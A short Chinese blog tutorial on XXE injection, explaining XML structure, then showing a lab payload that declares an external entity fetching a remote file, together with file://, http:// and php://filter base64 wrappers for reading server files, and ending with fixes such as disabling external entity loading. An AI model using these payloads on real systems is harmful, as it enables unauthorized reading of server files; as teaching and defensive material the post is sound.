认识XXE注入

最新推荐文章于 2024-07-24 15:20:08 发布
最新推荐文章于 2024-07-24 15:20:08 发布
阅读量355 收藏 10
点赞数 7
分类专栏: # WEB攻防 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58528311/article/details/134997848
版权

一、漏洞原理

XML是什么?

官方的说法:XML(可扩展标记语言,Extensible Markup Language)是一种用于描述数据的标记语言。它被设计用于传输和存储数据,尤其适用于因特网上的文档表示和信息交换。

简单的来说XML就相当于是一本书,而书中有章目录页,目录内引用的就是书中的内容这叫实体应用,而XXE攻击就是通过外部引用。

<?xml version="1.0" encoding="UTF-8"?> //是 XML 声明,指定 XML 版本和字符集。
<library>   //是根元素。
  <!-- This is a comment --> //是注释。
  <book category="fantasy">
    <title>Harry Potter</title>
    <author>J.K. Rowling</author>
  </book>
  <book category="science-fiction">
    <title>Dune</title>
    <author>Frank Herbert</author>
  </book>
  <book category="mystery">
    <title>Sherlock Holmes</title>   //元素包含文本内容。
    <author>Arthur Conan Doyle</author>  //元素包含文本内容。
  </book>
</library>

<?xml version="1.0" encoding="UTF-8"?> 是 XML 声明,指定 XML 版本和字符集。
<library> 是根元素。
<!-- This is a comment --> 是注释。
<book> 元素包含了一个属性 category,以及两个子元素 <title> 和 <author>。
<title> 和 <author> 元素包含文本内容。

二、漏洞利用

xxe靶场

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "http://172.16.234.196/1.txt"> ]>
<user><username>&xxe;</username><password>admin</password></user>

读取文件,通过调用用户用构造的payload

file://

http://url/文件名

php://filter/read=convert.base64-encode/resource=D:/phpstudy_pro/WWW/1.txt

三、漏洞修复

  1. 直接禁止外部实体引用,libxml_disable_entity_loader(true)
  2. 过滤用户提交的xml数据
Plkaciu
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebGoat8-xxe注入漏洞分析
09-15
XXE 注入漏洞分析 在 Web 应用程序安全测试中,XXE(XML External Entity)注入漏洞是一种常见的漏洞,攻击者可以通过该漏洞读取服务器上的敏感信息甚至控制服务器。下面是对 WebGoat8 中的 XXE 注入漏洞的分析。 ...
WEB安全之XXE实体注入漏洞.pdf
12-12
然而,XML的这种灵活性也引入了安全风险,如XXE(XML External Entity Injection,XML外部实体注入漏洞)。 **0x01 XML基础知识** XML文档由XML声明、DTD(Document Type Definition)文档类型定义(可选)和文档...
xxe-xml外部实体注入
nigo134的博客
07-27 2919
一、XXE 是什么 介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将
Web漏洞分析-SQL注入&XXE注入(中上)
qq_61861243的博客
12-04 167
某些查询是不需要返回结果的,仅判断查询语句是否正确执行即可,,但是由于某些限制,布尔盲注的关键字符带入不进去,这时候可以使用sleep来进行时间盲注,取页面执行时间(结束时间-开始时间)来判断sleep函数是否正常执行,所以其是否正常执行可以看做一个布尔值,正常显示为true,报错或是其他不正常显示为false。①、在SQLMAP检测的整个过程中,会有一个原始响应的定义,指的是在网站连通性检测的过程中如果网站成功响应,则把该响应定义为原始响应(包括状态码、HTTP响应头、HTTP响应体)
XXE攻击指南
rigous的博客
06-30 3522
现在许多不同的客户端技术,如web端,移动端,云端等使用XML向业务应用程序发送消息。为了使应用程序使用这些自定义的XML消息,应用程序必须去解析XML文档并检查格式是否正确。 本文将描述XML外部实体(XXE注入攻击及其基础知识,以便更好地了解如何攻击以及如何处理。 既然我们将谈论XXE注入,那么首先我们应该了解外部实体的含义以及实现的内容。 外部实体是指XML处理器必须解析
Java代码审计安全篇-XXE(XML外部实体注入)漏洞
m0_63138919的博客
03-14 1802
本文章参考qax的网络安全java代码审计和部分师傅审计思路,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
Web漏洞分析-SQL注入&XXE注入(中下)
qq_61861243的博客
12-05 220
在这个信息互联的时代,保护我们的Web应用免受SQL注入XXE注入等威胁是至关重要的。①、现在大多数的网站对于SQL注入都做了一定的防御,使用Mysql中转义的函数如addslashes,mysql_real_escape_string,mysql_escape_string等,还有配置magic_quote_gpc,不过PHP高版本已经移除此功能。利用MySQL的一种特性,GBK是多字节编码,两个字节就代表一个汉字,在%df加入的时候会和转义符\,即%5c进行结合,变成了一个“運”,而“逃逸了出来。
XML外部实体(XXE注入详解
zz_strive_2012的专栏
07-30 5004
###XML与xxe注入基础知识 1.XMl定义 XML由3个部分构成,它们分别是:文档类型定义(Document Type Definition,DTD),即XML的布局语言;可扩展的样式语言(Extensible Style Language,XSL),即XML的样式表语言;以及可扩展链接语言(Extensible Link Language,XLL)。 XML:可扩展标记语言,标准通用标记语言的子集,是一种用于标记电子文件使其具有结构性的标记语言。它被设计用来传输和存储数据(而不是储存数据),.
XXE,初次认识
WM_NNXX的博客
08-08 309
XXE,Xml External Entity Injection,XML外部实体注入攻击 攻击原理 因为实体可以通过预定义在文档中被调用,而实体的标识符又可以访问本地或者远程内容,当允许引用外部实体时,攻击者便可以构造恶意内容来达到攻击。 ** 名词介绍 ** XML xml 是一种可扩展的标记语言,主要就是用来传输数据的,你可以理解为就是一种写法类似于 html 语言的数据格式文档。 但是 h...
深入理解漏洞之 XXE 漏洞
weixin_50464560的博客
05-16 1137
介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将注意力集中于外部实体中,而不要
Web漏洞分析-SQL注入&XXE注入(上)
qq_61861243的博客
12-03 459
①、SQL Server 是Microsoft 公司推出的关系型数据库管理系统②、具有使用方便可伸缩性好与相关软件集成程度高等优点③、从旧版本的个人电脑到运行Microsoft Windows server 的大型多处理器的服务器都可以使用。
测试XXE注入.docx
09-06
测试 XXE 注入 XXE 注入(XML 外部实体注入)是一种类型的注入攻击,它会影响解析 XML 文件的应用程序。攻击者可以通过构造恶意的 XML 文件,使用外部实体来引用文件系统中的文件或网络资源,从而导致读取任意文件...
信息安全_xxe注入应用与拓展.pptx
08-14
XXE注入详解】 XXE,全称为XML External Entity Injection,是针对XML解析器的一种安全漏洞,它利用XML文档中的外部实体(External Entity)来获取系统敏感信息或执行恶意操作。XML实体允许开发者引用外部资源,...
测试XXE注入(1).xmind
11-25
测试XXE注入(1).xmind
网络安全常见错误及解决办法(更新中)
qq_42041946的博客
07-22 525
设置一下wwwtest访问权限做负载均衡使用火狐浏览器访问一直访问一个页面,使用谷歌就正常两个也轮换,是火狐浏览器的问题在nginx的配置文件里改站点根目录,但是网页报了403 Forbidden,重安装了个centos也不行强制刷新过了,改回相对路径html才可以。答:403就是没有权限 再/web这个文件夹下chown -R nginx:nginx .(如果不行就看看你的selinux 有没有关闭,vim /etc/selinux/config 看看是不是disabled。
等级保护 总结2
最新发布
qq_25467441的博客
07-24 413
FireHunter 6000是华为公司推出的高性能APT威胁检测系统,利用多引擎虚拟检测技术以及传统的安全检测技术,基于行为特征检测,识别网络中传输的恶意文件和C&C攻击,有效避免未知威胁攻击的扩散和企业核心信息资产损失。AntiDDoS管理等功能,支持安全功能服务化、可视化,协同网络、安全设备和大数据智能分析系统形成全面威胁感知、分析和响应的整网主动安全防护体系。安全态势感知系统协同网络和安全实现威胁自动近源处置,提升威胁处置效率,缩小威胁横向扩散的范围,降低威胁对业务的影响。
网络安全相关竞赛比赛
黑战士的博客
07-18 982
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
“微软蓝屏”事件:网络安全与系统稳定性的深刻反思
tian362的专栏
07-23 506
面对软件更新流程中的风险管理和质量控制问题、预防类似大规模故障的需求以及跨领域连锁反应的行业影响,我们需要从多个方面入手,加强风险识别与评估、完善测试流程、实施严格的质量控制措施、设计冗余系统、实施灾难恢复计划、建立高可用架构、利用自动化工具和监控系统以及加强跨行业合作等。通过部署多个相互独立的系统组件,可以在某个组件发生故障时,由其他组件接管其工作,从而确保系统整体的连续性和稳定性。在“微软蓝屏”事件中,微软的视窗系统作为众多行业信息系统的基石,其故障迅速波及到了多个领域,造成了广泛的影响。
webug4.0xxe注入
07-27
关于Webug 4.0的XXE注入漏洞,我不清楚具体的细节和漏洞位置。通常,修补XXE注入漏洞的方法是通过禁用外部实体的解析或限制实体解析的范围。为了更好地保护应用程序免受XXE注入攻击,您可以参考以下几点建议: 1. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值